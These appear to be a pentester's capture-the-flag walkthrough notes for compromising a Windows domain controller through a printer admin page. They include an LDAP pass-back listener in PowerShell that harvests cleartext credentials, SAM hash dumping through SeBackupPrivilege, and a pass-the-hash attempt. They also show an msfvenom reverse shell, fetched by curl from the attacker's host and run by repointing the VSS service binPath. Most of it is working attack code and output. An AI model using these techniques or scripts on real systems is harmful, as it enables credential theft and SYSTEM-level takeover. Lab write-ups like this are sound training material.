## `anonymous`
### ldap
- null sessions not permitted
### smb
- guest account disabled
### LLMNR Poisoning
- no love
## printer admin UI - 80 HTTP
![[Pasted image 20250131220231.png]]
- seems I can change the password for the `svc-printer` user here?
- gobuster yields nothing of interest
- we got a username?
- no [[ASREPRoast]]
- setting the password in the UI doesn't seem to do much?
- but I don't see any other ways as of now
- verifying the users existence using [[Kerbrute]]:
![[Pasted image 20250131222824.png]]
- attempting to brute-force the account using `kerbrute` (pray there's no account lock-out lol)
- setting the password to `admin` and attempting to authenticate as `svc-printer:admin` using [[NetExec-TODO]] yields no love.
- running `sudo nc -lnvp 389` locally and pointing the 'Server Address' input field at my tunnel IP, as so ![[Pasted image 20250131230438.png]] makes the printer bind to my listener instead of the real LDAP server. It uses an LDAP simple bind over plain TCP (no TLS), so the username and what I assume is the password arrive in cleartext (the junk bytes in front are just the BER framing of the bind request):
```
[λ]- [svc-printer]-> sudo nc -lnvp 389
Listening on 0.0.0.0 389
Connection received on 10.10.11.108 52665
0*`%return\svc-printer
1edFg43012!!
```
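The same pass-back capture, as an added example (not part of the original notes): a small listener that decodes the BER-encoded simple `BindRequest` the printer sends instead of reading nc's raw bytes. It assumes pwsh 7 on the attacker host, run as root so it can bind port 389, and a device that uses a simple bind over plain TCP; the sample packet is constructed inline to mirror the capture above.

```powershell
# Added example, not from the original notes: an LDAP "pass-back" listener that decodes the simple
# BindRequest. Assumes pwsh 7 on the attacker host, run as root so it can bind port 389 (assumption),
# and that the device does an LDAP simple bind over plain TCP.

function Read-BerTlv {
    # Read one BER tag/length/value at $Pos. Handles short and long-form (0x81 nn, 0x82 nn nn) lengths.
    param([byte[]]$Buf, [int]$Pos)
    $tag = [int]$Buf[$Pos]
    $len = [int]$Buf[$Pos + 1]
    $Pos += 2
    if ($len -band 0x80) {
        $n = $len -band 0x7F
        $len = 0
        for ($i = 0; $i -lt $n; $i++) { $len = ($len -shl 8) -bor [int]$Buf[$Pos + $i] }
        $Pos += $n
    }
    $val = [byte[]]::new($len)
    [Array]::Copy($Buf, $Pos, $val, 0, $len)
    [pscustomobject]@{ Tag = $tag; Value = $val; Next = $Pos + $len }
}

function ConvertFrom-LdapBindRequest {
    # LDAPMessage ::= SEQUENCE { messageID INTEGER, protocolOp BindRequest }
    # BindRequest ::= [APPLICATION 0] SEQUENCE { version INTEGER, name OCTET STRING, authentication }
    param([byte[]]$Data)
    $msg = Read-BerTlv $Data 0
    if ($msg.Tag -ne 0x30) { throw 'not an LDAPMessage (expected SEQUENCE)' }
    $id   = Read-BerTlv $msg.Value 0
    $op   = Read-BerTlv $msg.Value $id.Next
    if ($op.Tag -ne 0x60) { throw ('not a BindRequest, tag 0x{0:x2}' -f $op.Tag) }
    $ver  = Read-BerTlv $op.Value 0
    $name = Read-BerTlv $op.Value $ver.Next
    $auth = Read-BerTlv $op.Value $name.Next
    # simple authentication is context tag [0] = 0x80 and carries the password in the clear;
    # anything else (0xA3) is a SASL bind and there is nothing to harvest from this message
    if ($auth.Tag -ne 0x80) { throw 'SASL bind, no cleartext password in this message' }
    [pscustomobject]@{
        MessageId = [int]$id.Value[0]
        Version   = [int]$ver.Value[0]
        Name      = [Text.Encoding]::UTF8.GetString($name.Value)
        Password  = [Text.Encoding]::UTF8.GetString($auth.Value)
    }
}

function New-BindRequestSample {
    # Constructed offline test packet with the same layout as the nc capture above
    # (messageID 1, LDAPv3, simple auth); lengths stay below 0x80 so short-form lengths suffice.
    param([string]$Name = 'return\svc-printer', [string]$Password = '1edFg43012!!')
    $n = [Text.Encoding]::ASCII.GetBytes($Name)
    $p = [Text.Encoding]::ASCII.GetBytes($Password)
    $bind = [byte[]](0x02, 0x01, 0x03, 0x04, $n.Length) + $n + [byte[]](0x80, $p.Length) + $p
    $body = [byte[]](0x02, 0x01, 0x01, 0x60, $bind.Length) + $bind
    [byte[]]([byte[]](0x30, $body.Length) + $body)
}

function Start-LdapPassbackListener {
    # Accept one connection, decode the first message, print the credentials, hang up.
    param([int]$Port = 389)
    $listener = [Net.Sockets.TcpListener]::new([Net.IPAddress]::Any, $Port)
    $listener.Start()
    Write-Host "Listening on 0.0.0.0:$Port"
    try {
        $client = $listener.AcceptTcpClient()
        Write-Host "Connection received on $($client.Client.RemoteEndPoint)"
        $stream = $client.GetStream()
        $buf = [byte[]]::new(4096)
        $n = $stream.Read($buf, 0, $buf.Length)
        ConvertFrom-LdapBindRequest ([byte[]]($buf[0..($n - 1)]))
        $client.Close()
    } finally { $listener.Stop() }
}

# Offline check: the constructed packet starts 0x30 0x2a ('0*'), like the capture, and decodes to the creds
ConvertFrom-LdapBindRequest (New-BindRequestSample)
# Live use: Start-LdapPassbackListener -Port 389, then point the printer's 'Server Address' at this host
```

The decoder deliberately refuses anything that is not a simple bind: a SASL bind (for example GSSAPI/Kerberos) never carries the password in the message, so a device configured that way gives you nothing from this trick and the error tells you so immediately.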
- verifying the credentials using NetExec
- yields love on [[WinRM - 5986 HTTP]]
## `svc-printer`->`Administrator`
### SMB
- got `READ` on [[SMB Share - ADMIN$]]
- ![[Pasted image 20250131231039.png]]
### `SeBackupPrivilege`
`svc-printer` holds `SeBackupPrivilege` (check with `whoami /priv`), see [[AD Group - Backup Operator]]. Saving the `SAM` and `SYSTEM` hives with it, pulling them down and running them through secretsdump locally:
```
secretsdump.py -sam SAM -system SYSTEM LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:34386a771aaca697f447754e4863d38a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
```
- pass-the-hash with this hash doesn't seem to be working: `evil-winrm -i $RHOST -u Administrator -H 34386a771aaca697f447754e4863d38a`. On a domain controller that is expected: the `SAM` only holds the local (DSRM) accounts, so this is not the domain `Administrator`'s hash; that one lives in `NTDS.dit`.
### `Server Operators` Group
- members of `Server Operators` can start and stop Windows services and, as the `sc.exe config` call below shows, reconfigure them
- We leverage this to repoint the [Volume Shadow Copy Service (VSS)](https://learn.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service) `binPath` from its default binary to a malicious payload:
```powershell
# on the target (evil-winrm as svc-printer): drop the payload somewhere SYSTEM can read it
upload agent.exe
get-service vss
sc.exe config vss binPath="C:\Users\svc-printer\AppData\Local\Temp\DIFFERENT_PATINA.exe"
# times out
# on the attacker host: build a stageless reverse shell and serve it over HTTP (listener on 8080 must be up)
msfvenom -p windows/shell_reverse_tcp LHOST=$(get_tun0_ip.sh) LPORT=8080 --arch x64 -f exe > shell.exe
# back on the target: fetch it and point the service at it
curl 10.10.14.7/shell.exe -o shell.exe
sc.exe config vss binPath="C:\Users\svc-printer\AppData\Local\Temp\shell.exe"
# the new binPath only runs when the service is (re)started; the notes skip this step
sc.exe stop vss
sc.exe start vss
```
aaaaaand we get `r00t`.
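Added example, not from the original notes: the same `Server Operators` service hijack written so the original configuration is saved and restored, with the start behaviour a practitioner should expect. It assumes it runs inside the evil-winrm session as `svc-printer`, that `shell.exe` is already uploaded to the path below, and that a listener is waiting on `10.10.14.7:8080` (all assumptions).

```powershell
# Added example, not from the original notes. Run inside the evil-winrm session as svc-printer.
# Assumptions: shell.exe already uploaded to $payload, reverse-shell listener already up.
$svc     = 'vss'
$payload = 'C:\Users\svc-printer\AppData\Local\Temp\shell.exe'

# Server Operators members may change service config and start/stop services; confirm membership first
whoami /groups | Select-String -Pattern 'Server Operators'

# Keep the original ImagePath (Get-ItemProperty expands %systemroot% for us) so the box can be put back
$orig = (Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\$svc").ImagePath
"original binPath: $orig"

# sc.exe wants the 'binPath= value' form; PowerShell passes 'binPath=' and the path as two arguments
sc.exe config $svc binPath= "$payload"
sc.exe stop $svc | Out-Null       # harmless error 1062 if it was not running
sc.exe start $svc
# start reports error 1053 after ~30 s because shell.exe never talks to the SCM, but the payload has
# already run as NT AUTHORITY\SYSTEM and called back. The SCM may kill the process when it gives up,
# so spawn something persistent from the shell straight away.

# Restore the service so legitimate backups (and diskshadow) keep working
sc.exe config $svc binPath= "$orig"
sc.exe qc $svc
```

The restore step matters beyond tidiness: a VSS service left pointing at a deleted payload is an obvious artefact for the blue team, and breaks the very service the `SeBackupPrivilege` path above relies on.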